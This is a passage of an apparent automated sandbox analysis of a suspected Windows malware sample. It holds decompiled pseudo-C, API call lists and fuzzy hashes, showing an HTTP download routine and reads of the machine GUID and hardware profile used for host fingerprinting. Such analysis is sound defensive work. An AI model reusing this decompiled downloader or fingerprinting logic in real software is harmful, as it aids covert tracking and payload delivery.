                                                                                				goto L2;
                                                                                			}









































                                                                                0x0040a707
                                                                                0x0040a719
                                                                                0x0040a71f
                                                                                0x0040a723
                                                                                0x0040a79b
                                                                                0x0040a79e
                                                                                0x00000000
                                                                                0x0040a725
                                                                                0x0040a72a
                                                                                0x0040a731
                                                                                0x0040a742
                                                                                0x0040a751
                                                                                0x0040a760
                                                                                0x0040a761
                                                                                0x0040a767
                                                                                0x0040a76c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a76e
                                                                                0x0040a771
                                                                                0x0040a784
                                                                                0x0040a78d
                                                                                0x0040a78d
                                                                                0x0040a795
                                                                                0x00000000
                                                                                0x0040a795
                                                                                0x0040a753
                                                                                0x0040a753
                                                                                0x0040a7b4
                                                                                0x0040a7b4
                                                                                0x0040a7b7
                                                                                0x0040a7be
                                                                                0x0040a7c3
                                                                                0x0040a7c5
                                                                                0x0040a7cf
                                                                                0x0040a7d9
                                                                                0x0040a7e3
                                                                                0x0040a7f0
                                                                                0x0040a7fa
                                                                                0x0040a807
                                                                                0x0040a814
                                                                                0x0040a81e
                                                                                0x0040a826
                                                                                0x0040a827
                                                                                0x0040a828
                                                                                0x0040a83d
                                                                                0x0040a83d
                                                                                0x0040a723
                                                                                0x0040a6f2
                                                                                0x0040a6c7
                                                                                0x0040a1a5
                                                                                0x0040a1ae
                                                                                0x0040a1bb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040A0E3
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                  • Part of subcall function 00403A16: _memmove.LIBCMT ref: 00403A67
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 0040A674
                                                                                • DeleteUrlCacheEntry.WININET(?), ref: 0040A690
                                                                                • InternetOpenA.WININET(0043E028,00000000,00000000,00000000,00000000), ref: 0040A69F
                                                                                • InternetConnectA.WININET(000000FF,?,00000050,00000000,00000000,00000003,04000000,00000000), ref: 0040A6E7
                                                                                • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04000000,00000000), ref: 0040A719
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040A72A
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,0000000F,00000000), ref: 0040A749
                                                                                • InternetReadFile.WININET(00000000,?,00000BB7,00000400), ref: 0040A784
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040A795
                                                                                • InternetCloseHandle.WININET(?), ref: 0040A79E
                                                                                • InternetCloseHandle.WININET(000000FF), ref: 0040A7A7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp_memmove$CacheDeleteEntryOpenRequest$ConnectFileH_prolog3InfoQueryReadSend
                                                                                • String ID: ERROR$GET$http://$https://
                                                                                • API String ID: 1920747694-367639009
                                                                                • Opcode ID: 3f02466a9703aac3a4d8f2ceb8fb06137037ed84cd26ad318aaebe01eba41b90
                                                                                • Instruction ID: ed55058a10d5b21ec2d82e062bda0fed0c62309adfb4b3dff29228fbd62cc646
                                                                                • Opcode Fuzzy Hash: 3f02466a9703aac3a4d8f2ceb8fb06137037ed84cd26ad318aaebe01eba41b90
                                                                                • Instruction Fuzzy Hash: 00228D7180128CEEEB34DFA4CD45BEE77B8BF11318F10462AE955A71C1CBB85A08CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 574 c6ea60-c6ea64 575 c6ea6b-c6ea75 574->575 576 c6ea77-c6eaae ContinueDebugEvent GetSystemDirectoryW VirtualAlloc ActivateKeyboardLayout AcquireSRWLockShared 575->576 577 c6eab4-c6eab8 575->577 576->577 578 c6eaba-c6eabe 577->578 579 c6eacb-c6eadb 577->579 578->579 580 c6eac0-c6eac9 578->580 579->575 581 c6eadd-c6eaed GetModuleHandleW call c6c050 579->581 580->581 583 c6eaf2 581->583 584 c6eeae 583->584 584->584
                                                                                APIs
                                                                                • ContinueDebugEvent.KERNEL32(00000000,00000000,00000000), ref: 00C6EA7D
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C6EA87
                                                                                • VirtualAlloc.KERNEL32(00000000,001914BD,00003000,00000004), ref: 00C6EA9C
                                                                                • ActivateKeyboardLayout.USER32(00000000,00000000), ref: 00C6EAA6
                                                                                • AcquireSRWLockShared.KERNEL32(00000000), ref: 00C6EAAE
                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.dll), ref: 00C6EAE2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AcquireActivateAllocContinueDebugDirectoryEventHandleKeyboardLayoutLockModuleSharedSystemVirtual
                                                                                • String ID: K$KERNEL32.dll
                                                                                • API String ID: 3644739094-3624158019
                                                                                • Opcode ID: c8de8a46f56204f6c38f249ad1c179496cfa5cc47601148c737d47e886cc0140
                                                                                • Instruction ID: 1cb5e492967e6adc5a9135447f52ebe34b0be9d68ae43c574a70078d57313f9e
                                                                                • Opcode Fuzzy Hash: c8de8a46f56204f6c38f249ad1c179496cfa5cc47601148c737d47e886cc0140
                                                                                • Instruction Fuzzy Hash: B0012C74644344EFEB30DBD2DD8AB5D7B64BF01B07F288016FB069A2D1C7B15A40AB26
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 88%
                                                                                			E00415C6D(void* __edi, char* __esi) {
                                                                                				void* __ebx;
                                                                                				signed int _t18;
                                                                                				long _t23;
                                                                                				void* _t37;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                				char* _t43;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                
                                                                                				_t43 = __esi;
                                                                                				_t42 = __edi;
                                                                                				_t44 = _t46 - 0x18c;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                                				 *(_t44 - 0x7c) = 0;
                                                                                				 *(_t44 - 0x7c) = 0xff;
                                                                                				 *(_t44 + 0x88) = 0;
                                                                                				E00427E30(_t44 + 0x89, 0, 0xfe);
                                                                                				_t23 = RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Cryptography", 0, 0x20119, _t44 - 0x80); // executed
                                                                                				if(_t23 == 0) {
                                                                                					RegQueryValueExA( *(_t44 - 0x80), "MachineGuid", 0, 0, _t44 + 0x88, _t44 - 0x7c); // executed
                                                                                				}
                                                                                				RegCloseKey( *(_t44 - 0x80));
                                                                                				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                                				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                				 *_t43 = 0;
                                                                                				E0040381A(_t43, _t44 - 0x78);
                                                                                				_pop(_t37);
                                                                                				return E0041DEB4(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                                			}













                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00415CA8
                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00415CC4
                                                                                • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,?,?), ref: 00415CE3
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00415CEC
                                                                                • CharToOemA.USER32(?,?), ref: 00415CFD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                • API String ID: 2235053359-1211650757
                                                                                • Opcode ID: 38d0e98b8721e1a31ea6c3f9266c94ef96804df4a2f9be150f560df5f57cf177
                                                                                • Instruction ID: 5cdff529ecc6d4c3c2bed252064c6ea5fe031ea7453f6196bc54f06f4fad6540
                                                                                • Opcode Fuzzy Hash: 38d0e98b8721e1a31ea6c3f9266c94ef96804df4a2f9be150f560df5f57cf177
                                                                                • Instruction Fuzzy Hash: 7E114CB194020CAFEB309FA4DC85BEEBBACEB04348F50402AF515D6151DA749A488B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(00000014,00000020), ref: 00C6FC3A
                                                                                  • Part of subcall function 00C71BED: __lock.LIBCMT ref: 00C71C0B
                                                                                  • Part of subcall function 00C71BED: ___sbh_find_block.LIBCMT ref: 00C71C16
                                                                                  • Part of subcall function 00C71BED: ___sbh_free_block.LIBCMT ref: 00C71C25
                                                                                  • Part of subcall function 00C71BED: HeapFree.KERNEL32(00000000,00000000,00DAAAF0,0000000C,00C73F9D,00000000,00DAABD0,0000000C,00C73FD7,00000000,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C), ref: 00C71C55
                                                                                  • Part of subcall function 00C71BED: GetLastError.KERNEL32(?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001,00000214), ref: 00C71C66
                                                                                • _malloc.LIBCMT ref: 00C6FC76
                                                                                • GetProcessAffinityMask.KERNEL32 ref: 00C6FC8E
                                                                                • GetCurrentHwProfileW.ADVAPI32(00000000), ref: 00C6FC96
                                                                                • task.LIBCPMTD ref: 00C6FC9F
                                                                                • LoadLibraryW.KERNEL32(?), ref: 00C6FD12
                                                                                • _setbuf.LIBCMT ref: 00C6FD47
                                                                                • _calloc.LIBCMT ref: 00C6FD53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AffinityCurrentErrorExchangeFreeHeapInterlockedLastLibraryLoadMaskProcessProfile___sbh_find_block___sbh_free_block__lock_calloc_malloc_setbuftask
                                                                                • String ID:
                                                                                • API String ID: 2850343420-0
                                                                                • Opcode ID: 3d595dd68b40f9c1b77083727e9b3ff24a08b89be634cf1d79c57be20f0f9499
                                                                                • Instruction ID: ed89e17bd1eceb01ba0d75b6adefe35ee4a2f511c8aa1c773a96616809a67348
                                                                                • Opcode Fuzzy Hash: 3d595dd68b40f9c1b77083727e9b3ff24a08b89be634cf1d79c57be20f0f9499
                                                                                • Instruction Fuzzy Hash: 0C418670E04208EBDB20EFE4E886B9D7771EF14701F144029E606AB2D1EBB55A45D766
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 634 41eb16-41eb1e 635 41eb2d-41eb38 call 41e042 634->635 638 41eb20-41eb2b call 42482a 635->638 639 41eb3a-41eb3b 635->639 638->635 642 41eb3c-41eb4d 638->642 643 41eb7b-41eb95 call 41e1e3 call 421126 642->643 644 41eb4f-41eb7a call 41e0d6 call 41dfe6 642->644 644->643
                                                                                C-Code - Quality: 93%
                                                                                			E0041EB16(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                				char* _v8;
                                                                                				signed int _v16;
                                                                                				char _v20;
                                                                                				void* __ebp;
                                                                                				void* _t34;
                                                                                				signed int _t35;
                                                                                				signed int _t39;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t44;
                                                                                				void* _t51;
                                                                                				intOrPtr* _t54;
                                                                                				signed int _t59;
                                                                                				signed int _t60;
                                                                                				void* _t63;
                                                                                				void* _t64;
                                                                                				void* _t66;
                                                                                				intOrPtr* _t68;
                                                                                
                                                                                				_t66 = __esi;
                                                                                				_t64 = __edi;
                                                                                				_t63 = __edx;
                                                                                				_t51 = __ebx;
                                                                                				while(1) {
                                                                                					_t2 =  &_a4; // 0x404024, executed
                                                                                					_t34 = E0041E042(_t63, _t64, _t66,  *_t2); // executed
                                                                                					if(_t34 != 0) {
                                                                                						return _t34;
                                                                                					}
                                                                                					_t35 = E0042482A(_t34, _a4);
                                                                                					__eflags = _t35;
                                                                                					if(_t35 == 0) {
                                                                                						__eflags =  *0x448dbc & 0x00000001;
                                                                                						if(( *0x448dbc & 0x00000001) == 0) {
                                                                                							 *0x448dbc =  *0x448dbc | 0x00000001;
                                                                                							__eflags =  *0x448dbc;
                                                                                							_push(1);
                                                                                							_v8 = "bad allocation";
                                                                                							E0041E0D6(0x448db0,  &_v8);
                                                                                							 *0x448db0 = 0x43834c;
                                                                                							E0041DFE6( *0x448dbc, 0x437af8);
                                                                                						}
                                                                                						_t54 =  &_v20;
                                                                                						E0041E1E3(_t54, 0x448db0);
                                                                                						_v20 = 0x43834c;
                                                                                						E00421126( &_v20, 0x4441e0);
                                                                                						asm("int3");
                                                                                						_t39 = _v16;
                                                                                						_push(0x43834c);
                                                                                						_t68 = _t54;
                                                                                						 *((char*)(_t68 + 0xc)) = 0;
                                                                                						__eflags = _t39;
                                                                                						if(__eflags != 0) {
                                                                                							 *_t68 =  *_t39;
                                                                                							_t32 = _t39 + 4; // 0x403290
                                                                                							 *((intOrPtr*)(_t68 + 4)) =  *_t32;
                                                                                						} else {
                                                                                							_t42 = E00427B66(_t63, 0x448db0, __eflags);
                                                                                							 *((intOrPtr*)(_t68 + 8)) = _t42;
                                                                                							 *_t68 =  *((intOrPtr*)(_t42 + 0x6c));
                                                                                							 *((intOrPtr*)(_t68 + 4)) =  *((intOrPtr*)(_t42 + 0x68));
                                                                                							__eflags =  *_t68 -  *0x447e38; // 0x37b1498
                                                                                							if(__eflags != 0) {
                                                                                								_t60 =  *0x447bf0; // 0xfffffffe
                                                                                								__eflags =  *(_t42 + 0x70) & _t60;
                                                                                								if(__eflags == 0) {
                                                                                									 *_t68 = E0042793D(_t51, _t63, 0x448db0, _t68, __eflags);
                                                                                								}
                                                                                							}
                                                                                							__eflags =  *((intOrPtr*)(_t68 + 4)) -  *0x447af8; // 0x37b1658
                                                                                							if(__eflags != 0) {
                                                                                								_t59 =  *0x447bf0; // 0xfffffffe
                                                                                								__eflags =  *( *((intOrPtr*)(_t68 + 8)) + 0x70) & _t59;
                                                                                								if(__eflags == 0) {
                                                                                									 *((intOrPtr*)(_t68 + 4)) = E004271BC(_t51, _t63, 0x448db0, _t68, __eflags);
                                                                                								}
                                                                                							}
                                                                                							_t44 =  *((intOrPtr*)(_t68 + 8));
                                                                                							__eflags =  *(_t44 + 0x70) & 0x00000002;
                                                                                							if(( *(_t44 + 0x70) & 0x00000002) == 0) {
                                                                                								 *(_t44 + 0x70) =  *(_t44 + 0x70) | 0x00000002;
                                                                                								 *((char*)(_t68 + 0xc)) = 1;
                                                                                							}
                                                                                						}
                                                                                						return _t68;
                                                                                					} else {
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                			}





















                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 0041EB30
                                                                                  • Part of subcall function 0041E042: __FF_MSGBANNER.LIBCMT ref: 0041E05B
                                                                                  • Part of subcall function 0041E042: __NMSG_WRITE.LIBCMT ref: 0041E062
                                                                                  • Part of subcall function 0041E042: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,00402F66,00000010), ref: 0041E087
                                                                                • std::exception::exception.LIBCMT ref: 0041EB65
                                                                                • std::exception::exception.LIBCMT ref: 0041EB7F
                                                                                • __CxxThrowException@8.LIBCMT ref: 0041EB90
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                • String ID: $@@
                                                                                • API String ID: 615853336-1184905659
                                                                                • Opcode ID: c4afc4dd115130b1d55c1ea54a5313bd1ec4a872847ccb5b5bd61b576586f813
                                                                                • Instruction ID: e1db1529a4c6848ebdd2f33c6fe06aebc7df97a68ba4e8e95e8b6dedacd21b49
                                                                                • Opcode Fuzzy Hash: c4afc4dd115130b1d55c1ea54a5313bd1ec4a872847ccb5b5bd61b576586f813
                                                                                • Instruction Fuzzy Hash: 32F0F97890421966DB14FB57DC02ADE7A69AF95718F10402FFC01961D2DFBCAB81CB5C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 653 401102-401120 VirtualAlloc 654 401122-401125 653->654 655 401127-40112d 653->655 654->655 656 401156-401159 655->656 657 40112f-401150 call 427e30 VirtualFree 655->657 657->656
                                                                                C-Code - Quality: 47%
                                                                                			E00401102(void* __ecx) {
                                                                                				void* _t1;
                                                                                				void* _t3;
                                                                                				void* _t9;
                                                                                
                                                                                				_t1 = VirtualAlloc(0, 0x17c841c0, 0x3000, 4); // executed
                                                                                				_t9 = _t1;
                                                                                				_push(_t1);
                                                                                				if(_t1 != 0x11) {
                                                                                					asm("cld");
                                                                                				}
                                                                                				asm("clc");
                                                                                				_pop(_t3);
                                                                                				if(_t9 != 0) {
                                                                                					E00427E30(_t9, 0, 0x5e69ec0);
                                                                                					asm("cld");
                                                                                					return VirtualFree(_t9, 0x17c841c0, 0x8000);
                                                                                				}
                                                                                				return _t3;
                                                                                			}







                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,00000000,00000010,?,0040C5C0), ref: 00401114
                                                                                • _memset.LIBCMT ref: 0040113A
                                                                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,0040C5C0), ref: 00401150
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree_memset
                                                                                • String ID:
                                                                                • API String ID: 577486340-0
                                                                                • Opcode ID: 81e1b6dfd243f5df8ce09643b92863d98a6d5bbd2c00aeb03bb3bd9d33ddcaa0
                                                                                • Instruction ID: d7e502bdde5aa826ca195f459ec9796bc4ec950c9a7d352dff936d21666a0c4f
                                                                                • Opcode Fuzzy Hash: 81e1b6dfd243f5df8ce09643b92863d98a6d5bbd2c00aeb03bb3bd9d33ddcaa0
                                                                                • Instruction Fuzzy Hash: 0BE02BB638132033E12421253C9DFBB8A9C9782F75F311029F608E73D0D9258D0891F8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 660 403cac-403cb4 661 403cc0-403cc5 660->661 662 403cb6-403cbb call 41d3b9 660->662 664 403cd2-403cd8 661->664 665 403cc7-403ccb call 403f24 661->665 662->661 666 403cf2-403cf4 664->666 667 403cda-403cdd 664->667 672 403cd0 665->672 670 403d02-403d0b 666->670 671 403cf6-403cfc 666->671 667->666 669 403cdf-403ce4 667->669 673 403ce6 669->673 674 403ce8-403cf0 call 402c34 669->674 675 403d00 671->675 676 403cfe 671->676 672->670 673->674 674->670 675->670 676->675
                                                                                C-Code - Quality: 89%
                                                                                			E00403CAC(void* __ebx, char* __ecx, void* __edi, void* __ebp, intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* __esi;
                                                                                				intOrPtr _t7;
                                                                                				intOrPtr _t10;
                                                                                				void* _t14;
                                                                                				char* _t15;
                                                                                				void* _t17;
                                                                                				intOrPtr _t18;
                                                                                
                                                                                				_t17 = __edi;
                                                                                				_t15 = __ecx;
                                                                                				_t14 = __ebx;
                                                                                				_t18 = _a4;
                                                                                				if(_t18 > 0xfffffffe) {
                                                                                					E0041D3B9("string too long");
                                                                                				}
                                                                                				_t7 =  *((intOrPtr*)(_t15 + 0x14));
                                                                                				_t21 = _t7 - _t18;
                                                                                				if(_t7 >= _t18) {
                                                                                					__eflags = _a8;
                                                                                					if(_a8 == 0) {
                                                                                						L9:
                                                                                						__eflags = _t18;
                                                                                						if(_t18 == 0) {
                                                                                							 *((intOrPtr*)(_t15 + 0x10)) = 0;
                                                                                							__eflags = _t7 - 0x10;
                                                                                							if(_t7 >= 0x10) {
                                                                                								_t15 =  *_t15;
                                                                                							}
                                                                                							 *_t15 = 0;
                                                                                						}
                                                                                						goto L13;
                                                                                					}
                                                                                					__eflags = _t18 - 0x10;
                                                                                					if(_t18 >= 0x10) {
                                                                                						goto L9;
                                                                                					}
                                                                                					_t10 =  *((intOrPtr*)(_t15 + 0x10));
                                                                                					__eflags = _t18 - _t10;
                                                                                					if(_t18 < _t10) {
                                                                                						_t10 = _t18;
                                                                                					}
                                                                                					E00402C34(_t15, 1, _t10);
                                                                                					goto L13;
                                                                                				} else {
                                                                                					_push( *((intOrPtr*)(_t15 + 0x10)));
                                                                                					_push(_t18); // executed
                                                                                					E00403F24(_t14, _t15, _t17, _t18, _t21); // executed
                                                                                					L13:
                                                                                					asm("sbb eax, eax");
                                                                                					return  ~0x00000000;
                                                                                				}
                                                                                			}











                                                                                APIs
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00403CBB
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3CE
                                                                                  • Part of subcall function 0041D3B9: __CxxThrowException@8.LIBCMT ref: 0041D3E3
                                                                                  • Part of subcall function 0041D3B9: std::exception::exception.LIBCMT ref: 0041D3F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 1823113695-2556327735
                                                                                • Opcode ID: 617198cd35c81ecbde207c87ea40381cf19947083c991cb6268b74cc60b7e0dc
                                                                                • Instruction ID: 1c46651bd9e8eac6a21a0af06d38fdbeba248ee9fec2936164a89de7e55ab72b
                                                                                • Opcode Fuzzy Hash: 617198cd35c81ecbde207c87ea40381cf19947083c991cb6268b74cc60b7e0dc
                                                                                • Instruction Fuzzy Hash: 47F04C3150D1205EEB14AE29594166E3E49BF42705B304C7BF4A2FF2C2C239CD42438E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 679 415c16-415c4c GetCurrentHwProfileA 680 415c54 679->680 681 415c4e-415c52 679->681 682 415c59-415c6c call 40381a call 41deb4 680->682 681->682
                                                                                C-Code - Quality: 58%
                                                                                			E00415C16(intOrPtr __edi, intOrPtr __esi) {
                                                                                				signed int _v8;
                                                                                				struct tagHW_PROFILE_INFOA _v132;
                                                                                				char _v136;
                                                                                				void* __ebx;
                                                                                				signed int _t8;
                                                                                				int _t11;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                				signed int _t23;
                                                                                
                                                                                				_t22 = __esi;
                                                                                				_t21 = __edi;
                                                                                				_t8 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t8 ^ _t23;
                                                                                				_v136 = 0;
                                                                                				_t11 = GetCurrentHwProfileA( &_v132); // executed
                                                                                				 *((intOrPtr*)(__esi + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                                				_t17 = __esi;
                                                                                				 *((char*)(__esi)) = 0;
                                                                                				if(_t11 == 0) {
                                                                                					_push("Unknown");
                                                                                				} else {
                                                                                					_push( &(_v132.szHwProfileGuid));
                                                                                				}
                                                                                				E0040381A(_t17);
                                                                                				return E0041DEB4(_t22, 0, _v8 ^ _t23, _t20, _t21, _t22);
                                                                                			}















                                                                                APIs
                                                                                • GetCurrentHwProfileA.ADVAPI32(?), ref: 00415C36
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CurrentProfile
                                                                                • String ID: Unknown
                                                                                • API String ID: 2104809126-1654365787
                                                                                • Opcode ID: a2c18ba638635f137e384228a3320759b554aa98f7f1ddcf5dc983d42d67e498
                                                                                • Instruction ID: d6ff0abc5e520b43afe58a73493781b3fc12dee2e87154433b7c2203809e5786
                                                                                • Opcode Fuzzy Hash: a2c18ba638635f137e384228a3320759b554aa98f7f1ddcf5dc983d42d67e498
                                                                                • Instruction Fuzzy Hash: 71F08970B00709DBDB10DFB9D981699B7F8BF08709F50447ED142D7241DB7499088B95
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
